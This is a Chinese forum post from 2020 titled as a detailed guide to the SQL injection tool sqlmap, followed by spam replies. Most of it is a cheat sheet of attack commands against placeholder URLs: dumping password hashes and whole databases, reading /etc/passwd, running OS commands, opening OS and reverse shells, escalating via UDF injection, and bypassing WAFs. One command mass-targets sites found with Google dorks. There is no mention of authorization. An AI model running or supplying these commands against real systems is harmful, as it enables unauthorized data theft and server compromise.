请选择 进入手机版 | 继续访问电脑版

12360技术网 - 专业IT技术发表平台

 立即注册  找回密码
查看: 4217|回复: 6

SQL注入篇——注入工具sqlmap使用详解

[复制链接]

12

主题

30

帖子

424

积分

中级会员

Rank: 3Rank: 3

积分
424
发表于 2020-1-26 13:40:19 | 显示全部楼层 |阅读模式
sqlmap简介

sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。
sqlmap功能


  • 全力支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、Informix、MariaDB、MemSQL、TiDB、CockroachDB、HSQLDB、H2、MonetDB、Apache Derby、Vertica、Mckoi和Presto数据库管理系统。
  • 完全支持六种SQL注入技术:基于布尔的盲查询、基于时间的盲查询、基于错误的查询、基于联合查询的、基于堆栈的查询和带外查询。
  • 支持直接连接到数据库通过提供DBMS凭据、IP地址、端口和数据库名称,而无需通过SQL注入传递。
  • 支持枚举用户、密码散列、特权、角色、数据库、表和列
  • 密码哈希格式的自动识别和对使用基于字典的攻击破解它们。
  • 支持转储数据库表完整地说,根据用户的选择,有一系列的条目或特定的列。用户还可以选择仅转储每列条目中的字符范围。
  • 支持搜索特定数据库名称、跨所有数据库的特定表或跨所有数据库表的特定列。例如,这对于标识包含自定义应用程序凭据的表非常有用,而相关列的名称包含字符串,如name和PASS。
  • 支持下载和上传任何文件当数据库软件是MySQL、PostgreSQL或MicrosoftSQLServer时,从数据库服务器底层文件系统。
  • 支持执行任意命令并检索其标准输出当数据库软件是MySQL、PostgreSQL或MicrosoftSQLServer时,在底层操作系统的数据库服务器上。
  • 支持**在攻击者计算机和数据库服务器之间建立带外有状态tcp连接。**底层操作系统。该通道可以是交互式命令提示符、Meterpreter会话或根据用户选择的图形用户界面(VNC)会话。
  • 支持数据库进程的用户权限提升通过Metasploit‘s Meterpretergetsystem命令。
sqlmap安装

安装包下载地址:https://pypi.org/project/sqlmap/#files
1.将安装好的软件包解压到C盘根目录下


2.然后进入此文件夹复制路径


3.将复制的路径添加到系统环境变量


4.启动cmd终端,输入sqlmap.py使用此工具


sqlmap使用

获取基本内容

sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db # 获取当前数据库名称
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #获取列表名
sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #获取字段名
sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容
重要信息获取

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型
sqlmap -u "http://url/news?id=1" --users #列数据库用户
sqlmap -u "http://url/news?id=1" --dbs #列数据库
sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码
sqlmap -u "http://url/news?id=1" --passwords-U root -v 0 #列出指定用户数据库密码
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #列出指定字段,列出20 条
sqlmap -u "http://url/news?id=1" --dump-all -v 0 #列出所有数据库所有表sqlmap -u "http://url/news?id=1" --privileges #查看权限
sqlmap -u "http://url/news?id=1" --privileges -U root #查看指定用户权限sqlmap -u "http://url/news?id=1" --is-dba -v 1 #是否是数据库管理员
sqlmap -u "http://url/news?id=1" --roles #枚举数据库用户角色
sqlmap -u "http://url/news?id=1" --udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表
sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie注入
sqlmap -u "http://url/news?id=1" -b #获取banner信息sqlmap -u "http://url/news?id=1" --data "id=3" #post注入
sqlmap -u "http://url/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" #代理注入
sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" # 指定关键词
sqlmap -u "http://url/news?id=1" --sql-shell #执行指定sql命令sqlmap -u "http://url/news?id=1" --file /etc/passwd
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令sqlmap -u "http://url/news?id=1" --os-shell #系统交互shell
sqlmap -u "http://url/news?id=1" --os-pwn #反弹shell
sqlmap -u "http://url/news?id=1" --reg-read #读取win系统注册表sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" #保存进度
sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # 恢复已保存进度
高级用法

-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
sqlmap -g “google语法” --dump-all --batch #google搜索注入点自动 跑出所有字段        需保证google.com能正常访问
–technique        测试指定注入类型\使用的技术
不加参数默认测试所有注入技术
• B: 基于布尔的SQL 盲注
• E: 基于显错 sql 注入
• U: 基于 UNION 注入
• S: 叠层 sql 注入
• T: 基于时间盲注
–tamper 通过编码绕过 WEB 防火墙(WAF) Sqlmap 默认用 char()
sqlmap -u "http://url/news?id=1" --smart --level 3 --users # smart 智能level 执行测试等级
攻击实例:
Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password
                                                                                                                                       
                                                    
  • 点赞                        2                        
  • 收藏                        
  • 分享                                                                                                                        
  •                                                         
                                      
    • 文章举报                           
                                                
                                                                        
                                            
                                                        A̶n̶n̶s̶特殊符号的妙用                                                                发布了30 篇原创文章 · 获赞 177 · 访问量 2万+                                                                                            私信                                                            关注
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x




上一篇:三级数据库知识点学习(三)
下一篇:机房收费-----导出excel
回复

使用道具 举报

0

主题

16

帖子

346

积分

中级会员

Rank: 3Rank: 3

积分
346
发表于 2020-2-5 03:01:50 | 显示全部楼层
既然你诚信诚意的推荐了,那我就勉为其难的看看吧![www.12360.co]
回复

使用道具 举报

0

主题

9

帖子

199

积分

注册会员

Rank: 2

积分
199
发表于 2020-2-6 02:24:02 | 显示全部楼层
其实我一直觉得楼主的品味不错!呵呵![www.12360.co]
回复

使用道具 举报

0

主题

14

帖子

304

积分

中级会员

Rank: 3Rank: 3

积分
304
发表于 2020-2-8 09:41:37 | 显示全部楼层
这东西我收了!谢谢楼主![www.12360.co]
回复

使用道具 举报

0

主题

17

帖子

367

积分

中级会员

Rank: 3Rank: 3

积分
367
发表于 2020-2-11 00:41:41 | 显示全部楼层
楼主,大恩不言谢了![www.12360.co]
回复

使用道具 举报

0

主题

7

帖子

157

积分

注册会员

Rank: 2

积分
157
发表于 7 天前 | 显示全部楼层
楼主发贴辛苦了,谢谢楼主分享![www.12360.co]
回复

使用道具 举报

0

主题

15

帖子

325

积分

中级会员

Rank: 3Rank: 3

积分
325
发表于 6 天前 | 显示全部楼层
楼主太厉害了!楼主,I*老*虎*U![www.12360.co]
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

12360技术网

GMT+8, 2020-2-29 14:38 , Processed in 0.094320 second(s), 25 queries .

本网站内容收集于互联网,Www.12360.Co不承担任何由于内容的合法性及健康性所引起的争议和法律责任。 欢迎大家对网站内容侵犯版权等不合法和不健康行为进行监督和举报。

© 2019-2020 Www.12360.Co

快速回复 返回顶部 返回列表